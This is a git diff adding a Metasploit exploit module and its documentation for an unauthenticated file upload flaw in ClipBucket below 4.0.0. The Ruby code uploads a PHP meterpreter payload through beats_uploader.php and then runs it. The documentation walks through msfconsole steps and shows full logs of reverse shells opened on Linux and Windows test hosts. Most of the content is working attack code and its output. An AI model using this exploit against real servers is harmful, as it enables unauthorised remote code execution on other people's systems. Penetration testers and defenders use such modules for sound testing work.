diff --git a/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md b/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md new file mode 100644 index 0000000000..95d4936360 --- /dev/null +++ b/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md @@ -0,0 +1,111 @@ +## Description +A malicious file can be uploaded into the webserver by an unauthenticated attacker. It is possible for an attacker to upload +a malicious script file to issue operating system commands. + +## Vulnerable Application +According To publicly exploit Disclosure of ClipBucket < 4.0.0 - Release 4902 +this application is vulnerable to Unauthenticated Arbitrary File Upload +read more : https://www.exploit-db.com/exploits/44250/ + +**Vulnerable Application Link** +https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip + +## Vulnerable Application Installation Setup. +Download Application : ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip``` + +Unzip : ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ``` + +Move In WebDirectory : ```mv clipbucket-4881/upload/* /var/www/html/``` + +Change Owner : ```chown -R www-data:www-data /var/www/html/``` + +**And Follow Clipbucket Installer** +Visit : http://localhost/ + + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: `use exploit/multi/http/clipbucket_fileupload_exec` + 4. Do: `set rport ` + 5. Do: `set rhost ` + 6. Do: `check` +``` +[*] 10.22.1.4:80 The target appears to be vulnerable. +``` + 7. Do: `set lport ` + 8. Do: `set lhost ` + 9. Do: `exploit` + 10. You should get a shell. + +## Options + + **TARGETURI** + + TARGETURI by default is `/`, however it can be changed. + +## Scenarios +**TESTED AGAINST LINUX** +``` +msf > use exploit/multi/http/clipbucket_fileupload_exec +msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4 +rhost => 10.22.1.4 +msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80 +rport => 80 +msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket +targeturi => clipbucket +msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4 +lhost => 10.22.1.4 +msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050 +lport => 5050 +msf exploit(multi/http/clipbucket_fileupload_exec) > run + +[*] Started reverse TCP handler on 10.22.1.4:5050 +[*] Uploading payload.. +[+] Looking For Payload .... +[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php +[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ] +[*] Sending stage (37543 bytes) to 10.22.1.4 +[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530 +[+] Deleted 1520842928949a3f.php + +meterpreter > sysinfo +Computer : linux +OS : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64 +Meterpreter : php/linux +meterpreter > + +``` + +**TESTED AGAINST WINDOWS** +``` +msf > use exploit/multi/http/clipbucket_fileupload_exec +msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13 +rhost => 10.22.1.13 +msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80 +rport => 80 +msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest +TARGETURI => clipbucketest +msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4 +lhost => 10.22.1.4 +msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545 +lport => 4545 +msf exploit(multi/http/clipbucket_fileupload_exec) > exploit + +[*] Started reverse TCP handler on 10.22.1.4:4545 +[*] Uploading payload.. +[+] Looking For Payload .... +[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php +[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ] +[*] Sending stage (37543 bytes) to 10.22.1.13 +[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530 +[+] Deleted 152084407045df09.php + +meterpreter > sysinfo +Computer : AGENT22-PC +OS : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586 +Meterpreter : php/windows +meterpreter > + +``` \ No newline at end of file diff --git a/modules/exploits/multi/http/clipbucket_fileupload_exec.rb b/modules/exploits/multi/http/clipbucket_fileupload_exec.rb new file mode 100644 index 0000000000..319387d1c1 --- /dev/null +++ b/modules/exploits/multi/http/clipbucket_fileupload_exec.rb @@ -0,0 +1,140 @@ +## +# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "ClipBucket Unauthenticated Arbitrary File Upload lower than 4.0.0 - Release 4902", + 'Description' => %q{ + This module exploits a vulnerability found in ClipBucket version Lower than 4.0.0 - Release 4902. + A malicious file can be uploaded into the webserver using Unauthenticated Arbitrary File Upload attack. + It is possible for an attacker to upload a malicious script to issue operating system commands. + this issue caused by improper session handling in /action/beats uploader.php file. This module tested on ClipBucket [lt] 4.0.0 - Release 4902 in Windows7 and Kali Linux . + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'www.sec-consult.com', # Vulnerability Discovery, PoC + 'Touhid M.Shaikh ' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '44250' ] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'Encoder' => 'php/base64' + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Clipbucket < 4.0.0 - Release 4902', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Mar 03 2018", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/']) + ]) + end + + def uri + return target_uri.path + end + + def check + # Check version + peer = "#{rhost}:#{rport}" + + vprint_status("Trying to detect ClipBucket on target.") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "readme") + }) + + res2 = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "actions", "beats_uploader.php") + }) + + if res and res.code == 200 and res.body =~ /ClipBucket/ and res2.code == 200 + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Unknown + end + + vprint_status("Version NOT detected") + + end + + def exploit + peer = "#{rhost}:#{rport}" + + # generate the PHP meterpreter payload + stager = '' + + # Setting POST data + post_data = Rex::MIME::Message.new + post_data.add_part(stager, content_type = "application/octet-stream", transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"pfile.php\"") # payload + post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"plupload\"") # require for uploading + post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"name\"") + data = post_data.to_s + + + print_status("Uploading payload..") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, "actions", "beats_uploader.php"), + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + jsonres = res.get_json_document + + # If the server returns 200 and success yes, we assume we uploaded the malicious + # file successfully + if not res or res.code != 200 or jsonres['success'] != 'yes' + fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!") + end + print_good("Looking For Payload .... ") + pdir = jsonres['file_directory'] + file_name = jsonres['file_name'] + pext = jsonres['extension'] + print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext} ") + + # Payload name + pname = file_name + ".php" + + # Cleanup is Good Idea . + register_files_for_cleanup(pname) + + print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]" ) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "actions", pdir, pname) + }) + + # If we don't get a 200 when we request our malicious payload, we suspect + # we don't have a shell, either. + if res and res.code != 200 + print_error("Unexpected response, probably the exploit failed") + end +end + +end + +